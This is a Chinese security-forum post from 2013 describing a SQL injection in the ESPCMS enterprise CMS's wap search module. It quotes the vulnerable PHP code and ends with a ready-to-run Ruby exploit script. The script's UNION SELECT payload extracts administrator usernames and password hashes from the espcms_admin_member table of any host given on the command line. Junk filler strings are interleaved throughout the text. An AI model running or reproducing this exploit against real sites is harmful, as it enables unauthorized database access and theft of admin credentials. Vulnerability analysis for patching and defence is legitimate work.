中国网络渗透测试联盟
标题:
espcms wap模块搜索处SQL注入
[打印本页]
作者:
admin
时间:
2013-7-27 18:31
标题:
espcms wap模块搜索处SQL注入
0×0 漏洞概述0×1 漏洞细节
; D2 N$ ^+ P0 E" f) e4 B$ _6 q
0×2 PoC
0 \ r3 P8 x- }9 B4 r% S$ J+ W
E- z' u* L- r& D& P" G
9 N7 B' u1 ]! K
! |. M8 ^ L+ z0 Y1 }% {7 T9 a
0×0 漏洞概述
1 S5 F8 q/ U$ S" U0 S! A
* b" ?3 U7 c7 a. N! W
易思ESPCMS企业网站管理系统基于LAMP开发构建的企业网站管理系统,它具有操作简单、功能强大、稳定性好、扩展性及安全性强、二次开发及后期维护方便,可以帮您迅速、轻松地构建起一个强大专业的企业网站。
' A4 }' c5 X/ ]; p/ C( z, c2 l' d8 T% Z
其在处理传入的参数时考虑不严谨导致
SQL注入
发生
9 P( F+ Q* l) a2 M
' E9 z' ^5 ~% w! {$ K
s# ]0 h: W7 v9 ]+ e6 T
0×1 漏洞细节
: Q) M1 i8 `$ v- ~9 ^6 p9 j
3 \. s- ^; F5 S: P1 t; p
变量的传递过程是$_SERVER['QUERY_STRING']->$urlcode->$output->$value->$db_where->$sql->mysql_query,整个过程无过滤导致了注入的发生。
0 O5 d% \1 k. S8 N& I* y; k5 X
正因为变量是从$_SERVER['QUERY_STRING']中去取的,所以正好避开了程序的过滤。
0 c. A, d, i% r. S9 }" A
而注入的变量是数组的值,并非数组的key,所以也没过被过滤,综合起来形成了一个比较少见的
SQL注入
。
5 Q! M5 j4 T& b( H' A% N0 c X3 k
0 H3 X' B8 }# P \6 x+ _; q
在/interface/3gwap_search.php文件的in_result函数中:
. v, R2 _7 s7 t
- [* J o( r$ R4 I! j; E
" k- g+ _( X; ]7 B. V
* k4 }1 t# Q8 K
function in_result() {
# g: V$ i" X$ \. D* u
... ... ... ... ... ... ... ... ...
" ~3 c H' J: B2 ]5 ~: K+ b
$urlcode = $_SERVER[ 'QUERY_STRING '];
8 k: f( z9 X- V3 |, c! `
parse_str(html_entity_decode($urlcode), $output);
% c( U/ X" w. f+ j+ Y2 N: t
$ |) Z& g* A6 v, n2 V5 h
... ... ... ... ... ... ... ... ...
& F/ A3 o. b0 z% E" v& s
if (is_array($output['attr' ]) && count($output['attr']) > 0) {
# {- a3 S% c( l- y) ~
( } `& z0 C' W) B7 e
$db_table = db_prefix . 'model_att';
5 ~- K `7 R- i0 X7 h0 G4 ~+ Z* Y
/ x6 p( s, C, a J# R4 `* b4 R. f1 n
foreach ($output['attr' ] as $key => $value) {
- _; k& V! I' P* j2 E
if ($value) {
1 ^' o0 P# G5 [ m! s$ O5 r! I
$ y! O' y$ ?* j* m) w2 { m
$key = addslashes($key);
" s# r" L- Q3 z9 @8 r' a
$key = $this-> fun->inputcodetrim($key);
4 s3 X" b! g. I7 j2 f& z
$db_att_where = " WHERE isclass=1 AND attrname='$key'";
3 O+ {1 z; [& p1 H
$countnum = $this->db_numrows($db_table, $db_att_where);
( q! O) Y; o, Q
if ($countnum > 0) {
* B' x% v, p6 j
$db_where .= ' AND b.' . $key . '=\'' . $value . '\'' ;
0 r/ b9 i9 a p
}
) k4 h; X& u2 L: r0 w P) g
}
- H8 K) }& @+ y: t% v: {* o
}
5 V1 q# [8 F. c1 v4 J3 F: i
}
0 }. q( J0 K$ g# o4 y
if (!empty ($keyword) && empty($keyname)) {
6 V! u) Y1 y' X
$keyname = 'title';
: k3 _0 M( S" G" Y: C. i( K; F. _
$db_where.= " AND a.title like '%$keyword%'" ;
J6 c" W' o; [, H
} elseif (!empty ($keyword) && !empty($keyname)) {
4 l: j! Z' U H0 e5 i2 n0 ]
$db_where.= " AND $keyname like '% $keyword%'";
9 Q" _* h( w1 R6 l$ e. u) n
}
5 @* B/ [9 Y- N7 g" M
$pagemax = 15;
+ R _' M4 [( y
% T3 a7 g2 J; E1 M
$pagesylte = 1;
# e! Z/ z6 C8 @7 q
' p8 e2 w: v* o0 U7 M/ B4 j( `
if ($countnum > 0) {
$ D% X/ k) T) D/ b8 n& Z- r
, D& L, s7 e* I" d
$numpage = ceil($countnum / $pagemax);
: N7 m6 n' d+ h6 M- v5 ]
} else {
, F" z7 e9 @& N9 o* w4 U, m
$numpage = 1;
% C" K7 w- ?3 k0 n6 @. v8 ~
}
" U M3 e9 [& y& y( V' G, l2 o
$sql = "SELECT b.*,a.* FROM " . db_prefix . "document AS a LEFT JOIN " . db_prefix . "document_attr AS b ON a.did=b.did " . $db_where . ' LIMIT 0,' . $pagemax;
5 N( q0 m! Y7 B
$this-> htmlpage = new PageBotton($sql, $pagemax, $page, $countnum, $numpage, $pagesylte, $this->CON ['file_fileex' ], 5, $this->lng['pagebotton' ], $this->lng['gopageurl'], 0);
% @" {$ {: y4 r4 O, O N) p
$sql = $this-> htmlpage->PageSQL('a.did' , 'down' ); $rs = $this->db->query($sql);
+ k+ z1 f$ L1 J7 f5 l1 |
... ... ... ... ... ... ... ... ...
' v, V# N2 q- T# x
}
. e e$ E# C, }4 W, ?! f4 a
6 r5 W9 _% X& D" P& [6 ]; D I0 b
; H3 ?+ m9 \1 j6 }: Q
0×2 PoC
2 Q! Y- M: B( O9 e6 H% h
( o% h) S: Z6 T% z
$ U: q% @9 C4 H1 J. z k
9 b: y% W" n9 v' m/ ?% {
require "net/http"
+ o6 A) [* q! k1 F6 ]3 o
7 s- @# U: w( G5 a2 R! {* F0 j F( ]
def request(method, url)
5 n. W2 k. i' b* c. `! S- j" X
if method.eql?("get")
6 W0 n T* h: q4 t
uri = URI.parse(url)
* u9 [3 |2 e' |9 V; q' @7 I5 x% c
http = Net::HTTP.new(uri.host, uri.port)
Z$ ]; `- ], c( C7 R* g
response = http.request(Net::HTTP::Get.new(uri.request_uri))
. ^1 f+ V2 h) l+ r& ]( X4 g
return response
$ |; P. n" o; [3 e
end
4 a! X1 Q: i! o/ {/ c& _- c! `
end
! c' S1 Q8 H8 J
t. a c& g$ t: _) J/ K3 |
doc =<<HERE
" D) F* l4 z; ?8 n
-------------------------------------------------------
: ^- X8 v, R. K1 u* S6 a
Espcms Injection Exploit
, K. Q, H N. t5 N/ a0 c
Author:ztz
9 F/ _' w) u& U' s6 U
Blog:
http://ztz.fuzzexp.org/
/ |/ f4 F [& b: |! i( ]1 y! f- L
-------------------------------------------------------
- Y( b7 |! o/ U' G* A) Y
6 z# t1 m2 x3 C% v1 L. e, F
HERE
) P& K' j$ u( P3 Y' f: s
' _4 R5 V% q5 H9 \* [0 ?
usage =<<HERE
. m/ y* r# u9 ?6 _
Usage: ruby #{$0} host port path
$ c9 a, A1 }. A# n
example: ruby #{$0}
www.target.com
80 /
0 j, N$ e) E7 A! P! o7 _, ^* g
HERE
7 g5 ~9 C& E9 s" v
: [! e4 j; I! G; g
puts doc
- J9 Z; o& R' \) t
if ARGV.length < 3
& U9 J9 w# m b' v, B
puts usage
/ W& R5 o) Q$ R. p
else
# L9 H2 u( m7 V
$host = ARGV[0]
; n; N1 L5 c" I4 M& B/ k
$port = ARGV[1]
5 p. ^5 t, b; p4 e/ Z
$path = ARGV[2]
9 G0 X- f, Z/ r0 W" N! [ |
% l! N. S( q) L! e T* L! V
puts "
send request..."
( v+ I- ~& Z1 T8 `: [; a
url = "http://#{$host}:#{$port}#{$path}wap/index.php?ac=search&at=result&lng=cn&mid=3&tid=11&keyword=1&keyname=a.title&countnum=1&
) R( o0 [& M( q# A, o) C
attr[jobnum]=1%27%20and%201=2%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13
$ O9 j* [$ t# |, U
,14,15,16,17,18,19,20,21,22,23,24,25,concat%28username,CHAR%2838%29,password%29,27
$ T( w+ o7 Z+ _: P) S O% F
,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45%20from%20espcms_admin_member;%23"
) \. x$ F( B7 h1 E; V! |" N
response = request("get", url)
6 L4 r) L2 @) y: N
result = response.body.scan(/\w+&\w{32}/)
% B# l# ~6 k( [" x5 y) }
puts result
- i/ g% |2 o7 c' [7 E `
end
* }! }6 N: q+ O, r$ `9 L
" C, R8 G# s$ j% W7 }' ?1 g
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2